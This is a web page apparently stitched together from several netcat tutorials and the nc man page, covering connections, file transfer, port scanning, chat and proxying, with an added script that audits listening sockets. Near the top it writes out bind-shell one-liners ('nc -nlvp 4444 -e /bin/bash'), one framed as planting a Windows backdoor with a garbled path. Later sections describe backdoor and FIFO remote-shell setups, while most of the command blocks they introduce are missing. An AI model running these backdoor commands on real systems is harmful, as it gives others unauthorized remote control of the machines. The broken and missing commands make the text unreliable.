Netcat is a powerful and versatile network tool that is available for Linux, Mac, and Windows machines. It is simple to use and essential learning for everyone interested in network communication.
The core functionality of Netcat is allowing two computers to connect and share resources. The name is a portmanteau of network and concatenate, which is a fancy word for joining things together.
Connections can be made directly between machines via TCP or UDP ports. Once established, there are many potential use cases. Communication can work bidirectionally, so files or information can move from listener to client or client to listener.
- If you want to get a reverse shell from a Windows machine or if you want to plant a backdoor in Windows, use this command. nc -nlvp 4444 -e C: Windows System32. And if you want to get the shell of any Linux machine, use this command to start listener mode on the Linux machine and execute a shell. nc -nlvp 4444 -e /bin/bash.
- Netcat is a versatile networking tool that can be used to interact with computers using UDP or TCP connections. It can function as a simple file server, simple web server, simple point-to-point chat implementation, a simple port scanner and more.
- Example: 5) NC as a proxy. NC can also be used as a proxy with a simple command. Let’s take an example, $ ncat -l 8080 | ncat 192.168.1.200 80. Now all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80.
Netcat is known as the IT “Swiss Army Knife” because of its wide range of functionalities. It can be used for simple file sending, chatting, web serving, and running code remotely. The list is extensive and varied.
How do I use nc to scan ports on Linux, UNIX and Windows servers? If nmap is not installed, try the nc / netcat command as follows. The -z flag can be used to tell nc to report open ports, rather than initiate a connection. Run the nc command with the -z flag. You need to specify the host name / IP along with the port range to limit and speed up the operation.
I will highlight some of the more common applications throughout this article.
Notoriously, netcat can be used for creating “back door” access. I will explain how this works, but keep in mind this is no longer part of the nc software due to its potential for malicious use.
Netcat (nc) command examples
Here’s the syntax for the nc command:
The syntax can vary depending on the application, but for most uses, your commands will follow this basic pattern.
Let’s see
1. Create a Connection Using TCP with netcat command
As I mentioned earlier, the core functionality of netcat is joining two machines together. You can set up a connection using TCP to connect two separate machines; you can also emulate that connection using the terminal.
The Listening Machine:
This command opens port 8080 and tells the machine to begin listening on this port.
In order to establish a connection, you will use another terminal and enter the following.
The Client Machine:
You can also use ‘localhost’ in place of the IP, or use the IP of your second PC here if you are making a remote connection.
That’s it, you have opened a TCP port and established a connection between two systems.
Quick Intro to TCP vs UDP
Why do we use TCP by default? TCP is an older technology than UDP and they operate at different levels of the OSI model. I will give a quick overview of the differences between them and describe some situations where you may choose one over the other.
TCP has strong error-correction capabilities. What does that mean? Basically, this means that while data packets are in transit from system to system, there are continuous tests being performed. These tests make sure that the information from System A is copied accurately to System B. This is a very simplified version of what happens as information travels across networks (the internet).
There are many protocols used in internet communication, though, not just TCP. UDP has different rules than TCP. Neither is necessarily “better” but they can each excel at performing different tasks.
Why would we use UDP over TCP or vice versa? It depends on the application. TCP is slower, but more reliable for transferring data accurately.
UDP can be chosen in situations where speed is more important than reliability when transmitting information. One example of this is streaming data, like video. Video can be transferred more quickly over UDP, and even if there are errors in the transmission, they are less likely to impact the user experience.
2. Create a connection using UDP with nc command
The steps for making a UDP connection are virtually identical to the ones we’ve already followed. You will add an option flag to specify that the type of port you want to open is UDP, not the default TCP.
It’s that simple. That’s all you need to do to open UDP port ‘999’.
You might wonder if you can use TCP and UDP with the same port number. You can, because they are separate protocols.
3. Use nc command to transfer files between remote systems
There are other methods for transferring files from one system to another. You can also use the netcat command for this purpose.
For this example, I created a demo that illustrates a remote file transfer from my Linux machine to my MacBook Pro.
Set up the Linux PC to Receive
You begin listening on the receiving machine on TCP port 9999. The ‘>’ tells the machine you are expecting a file to be transferred. The name that follows is the local name for the file.
Set up the Mac PC to Send
The IP address here belongs to the Linux machine. You flip the symbol to ‘<’ and the file ‘toLinux.file’ will be copied onto the remote machine as ‘fromMac.file’.
Here’s an example using two different machines to send a file.
4. Use nc command for port scanning
There might be more efficient options for port scanning, but it can be done with netcat. Since netcat comes installed by default on most operating systems, it’s nice to know how to do this if you need to do some quick troubleshooting. You’ll use the ‘-n’ flag and display verbose output.
This attempts to make a connection to ports between 1-100. Port 80 is HTTP, as I’m sure many of you know. This port is normally open on machines because it is used for connecting to the internet.
When I use this command, I’m actually attempting to connect to all of the ports between 1-100. It successfully connects to port 80, but generates an error message from Apache. I end up with some HTML output on the terminal because my computer sees it as a bad page request.
Zero I/O Mode
To avoid this, you can use the -z flag, which stands for zero input/output. This is the built-in port-scanning mode for netcat. I still get the same language, but it does not actually make the connection to port 80 generating the bad request error. Instead it continues through all scanned ports.
5. Chat with Netcat
This is a more fun way to use netcat. When you establish a TCP connection like above, you can actually “chat” from machine to machine. It’s less novel in an era where texting and chat applications are ubiquitous but this would have totally blown someone’s mind back in 1996.
Here’s an animation that shows me talking from one terminal to another.
Pretty cool, right?
Bonus Tip: Create a backdoor with nc command
I will show this for demonstration purposes only. Please be aware that unauthorized use of this command could be considered criminal activity in your locale.
In fact, this command no longer does anything with ‘nc’. There are ways to do it, but you will have to find them somewhere else. Once again, this is intended only to show the capability.
The -e flag tells nc to execute a program once a connection is made. A common way for malicious actors to gain access is to create such a backdoor on an open port and use that to execute scripts or otherwise manipulate the file system.
So if the attacker somehow gained access to the “victim” machine, they can create a backdoor like this:
Now the attackers can use this backdoor to access the system remotely and execute commands. So, from the attacker’s system:
This enables the attacker to access your computer remotely from the command line. Once connected, I can run bash commands similarly to how I could if I was using the computer directly.
I’m sure you can imagine how someone without the best of intentions could abuse this power. This makes it very important to monitor port activity on any network.
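One way to act on that advice, as an added example that is not part of the original article: a shell function that reads `ss -H -tlnp` output and flags listeners owned by netcat as well as ports outside an allowlist. The function names, the `ALLOWED_PORTS` allowlist and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: review listening TCP sockets for netcat-style backdoors.
# Live use on Linux (iproute2):  ss -H -tlnp | audit_listeners
# ALLOWED_PORTS is an assumed, site-specific allowlist of expected services.
ALLOWED_PORTS="22 80 443"

# Reads `ss -H -tlnp` lines on stdin; prints "reason scope port process pid".
audit_listeners() {
    awk -v allowed="$ALLOWED_PORTS" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "LISTEN" {
        # Column 4 is Local Address:Port; the port follows the last colon,
        # which also handles forms such as [::]:8080 and *:80.
        port = $4; sub(/^.*:/, "", port)
        host = $4; sub(/:[^:]*$/, "", host)
        proc = "unknown"; pid = "-"
        if (match($0, /\(\("[^"]+"/)) proc = substr($0, RSTART + 3, RLENGTH - 4)
        if (match($0, /pid=[0-9]+/))  pid  = substr($0, RSTART + 4, RLENGTH - 4)
        scope = (host ~ /^127\./ || host == "[::1]") ? "loopback" : "exposed"
        reason = ""
        # nc, ncat, netcat and packaged variants such as nc.openbsd
        if (proc ~ /^(nc|ncat|netcat)(\.|$)/) reason = "netcat-listener"
        else if (!(port in ok))               reason = "port-not-allowlisted"
        if (reason != "") print reason, scope, port, proc, pid
    }'
}

# Constructed sample of `ss -H -tlnp` output (not captured from a real host).
sample_ss() {
    cat <<'EOF'
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 1 0.0.0.0:4444 0.0.0.0:* users:(("nc",pid=2291,fd=3))
LISTEN 0 10 127.0.0.1:1234 0.0.0.0:* users:(("nc",pid=2300,fd=3))
LISTEN 0 511 *:80 *:* users:(("apache2",pid=640,fd=4))
LISTEN 0 1 [::]:8080 [::]:* users:(("ncat",pid=2410,fd=4))
LISTEN 0 5 0.0.0.0:9999 0.0.0.0:* users:(("python3",pid=3001,fd=3))
EOF
}

sample_ss | audit_listeners
```

Run it as root on a live host so that `ss` can report the owning process for every socket; without that, sockets of other users show up as `unknown` and are judged by port alone.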
I hope you enjoyed this brief introduction to the netcat command. As always, let us know what you think in the comment section.
On Unix-like operating systems, the nc command runs Netcat, a utility for sending raw data over a network connection.
This document covers the Linux version of nc.
Description
Netcat is a utility that reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable 'back-end' tool that can be used directly or driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Common uses include:
- Simple TCP proxies
- Shell-script based HTTP clients and servers
- Network daemon testing
- A Socks or HTTP ProxyCommand for ssh
Syntax
Options
-4 | Forces nc to use IPv4 addresses only. |
-6 | Forces nc to use IPv6 addresses only. |
-b | Allow broadcast. |
-C | Send CRLF as line-ending. |
-D | Enable debugging on the socket. |
-d | Do not attempt to read from stdin. |
-h | Prints out nc help. |
-I length | Specifies the size of the TCP receive buffer. |
-i interval | Specifies a delay time interval between lines of text sent and received. Also, causes a delay time between connections to multiple ports. |
-k | Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the -l option. |
-l | Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored. |
-n | Do not do any DNS or service lookups on any specified addresses, hostnames or ports. |
-O length | Specifies the size of the TCP send buffer. |
-P proxy_username | Specifies a username to present to a proxy server that requires authentication. If no username is specified then authentication will not be attempted. Proxy authentication is only supported for HTTP CONNECT proxies at present. |
-p source_port | Specifies the source port nc should use, subject to privilege restrictions and availability. |
-q seconds | After EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever. |
-r | Specifies that source or destination ports should be chosen randomly instead of sequentially within a range or in the order that the system assigns them. |
-S | Enables the RFC 2385 TCP MD5 signature option. |
-s source | Specifies the IP of the interface that is used to send the packets. For UNIX-domain datagram sockets, specifies the local temporary socket file to create and use so that datagrams can be received. It is an error to use this option in conjunction with the -l option. |
-T toskeyword | Change IPv4 TOS value. toskeyword may be one of critical, inetcontrol, lowcost, lowdelay, netcontrol, throughput, reliability, or one of the DiffServ Code Points: ef, af11 ... af43, cs0 ... cs7; or a number in either hex or decimal. |
-t | Causes nc to send RFC 854 DON'T and WON'T responses to RFC 854 DO and WILL requests. This makes it possible to use nc to script telnet sessions. |
-U | Specifies to use UNIX-domain sockets. |
-u | Use UDP instead of the default option of TCP. For UNIX-domain sockets, use a datagram socket instead of a stream socket. If a UNIX-domain socket is used, a temporary receiving socket is created in /tmp unless the -s flag is given. |
-V rtable | Set the routing table to be used. The default is 0. |
-v | Have nc give more verbose output. |
-w timeout | Connections which cannot be established or are idle timeout after timeout seconds. The -w flag has no effect on the -l option, i.e. nc will listen forever for a connection, with or without the -w flag. The default is no timeout. |
-X proxy_protocol | Requests that nc should use the specified protocol when talking to the proxy server. Supported protocols are '4' (SOCKS v.4), '5' (SOCKS v.5) and 'connect' (HTTPS proxy). If the protocol is not specified, SOCKS version 5 is used. |
-x proxy_address[:port] | Requests that nc should connect to destination using a proxy at proxy_address and port. If port is not specified, the well-known port for the proxy protocol is used (1080 for SOCKS, 3128 for HTTPS). |
-Z | DCCP mode. |
-z | Specifies that nc should only scan for listening daemons, without sending any data to them. It is an error to use this option in conjunction with the -l option. |
destination can be a numerical IP address or a symbolic hostname (unless the -n option is given). In general, a destination must be specified, unless the -l option is given (in which case the local host is used). For UNIX-domain sockets, a destination is required and is the socket path to connect to (or listen on if the -l option is given).
port can be a single integer or a range of ports. Ranges are in the form nn-mm. In general, a destination port must be specified, unless the -U option is given.
Client/Server model
It is quite simple to build a very basic client/server model using nc. On one console, start nc listening on a specific port for a connection. For example:
nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on:
There should now be a connection between the ports. Anything typed at the second console will be concatenated to the first, and vice-versa. After the connection has been set up, nc does not really care which side is being used as a ‘server’ and which side is being used as a ‘client’. The connection may be terminated using an EOF (‘^D’).
There is no -c or -e option in modern netcat, but you can still execute a command after a connection is established by redirecting file descriptors. Be cautious here, because opening a port and letting anyone who connects execute arbitrary commands on your site is DANGEROUS. If you really need to do this, here is an example:
On ‘server’ side:
On ‘client’ side:
(shell prompt from host.example.com)
By doing this, you create a fifo at /tmp/f and make nc listen on port 1234 of address 127.0.0.1 on the ‘server’ side. When a ‘client’ successfully establishes a connection to that port, /bin/sh gets executed on the ‘server’ side and the shell prompt is given to the ‘client’ side.
When the connection is terminated, nc quits as well. Use -k if you want it to keep listening, but if the command quits this option won't restart it or keep nc running. Also, don't forget to remove the file descriptor once you don't need it anymore:
Data transfer
The example in the previous section can be expanded to build a basic data transfer model. Any information input into one end of the connection will be output to the other end, and input and output can be easily captured to emulate file transfer.
Start by using nc to listen on a specific port, with output captured into a file:
Using a second machine, connect to the listening nc process, feeding it the file that is to be transferred:
After the file is transferred, the connection will close automatically.
Talking to servers
It is sometimes useful to talk to servers 'by hand' rather than through a user interface. It can aid in troubleshooting, when it might be necessary to verify what data a server is sending in response to commands issued by the client. For example, to retrieve the homepage of a website:
Note that this also displays the headers sent by the web server. They can be filtered, using a tool such as sed, if necessary.
More complicated examples can be built up when the user knows the format of requests required by the server. As another example, an e-mail may be submitted to an SMTP server using:
Port scanning
It may be useful to know which ports are open and running services on a target machine. The -z flag can be used to tell nc to report open ports, rather than initiate a connection. Usually, it's useful to turn on verbose output to stderr by using this option in conjunction with the -v option.
For example:
The port range was specified to limit the search to ports 20 - 30, and is scanned in increasing order.
You can also specify a list of ports to scan, for example:
The ports are scanned in the order you give them.
Alternatively, it might be useful to know which server software is running, and which versions. This information is often contained in the greeting banners. To retrieve these, it is necessary to first make a connection, and then break the connection once the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a 'QUIT' command to the server:
Examples
Opens a TCP connection to port 42 of host.example.com, using port 31337 as the source port, with a timeout of 5 seconds.
Opens a UDP connection to port 53 of host.example.com.
Opens a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection.
Creates and listens on a UNIX-domain stream socket.
Connects to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080. This example could also be used by ssh.
The same as the above example, but this time enabling proxy authentication with username 'ruser' if the proxy requires it.
Related commands
ifconfig — View or modify the configuration of network interfaces.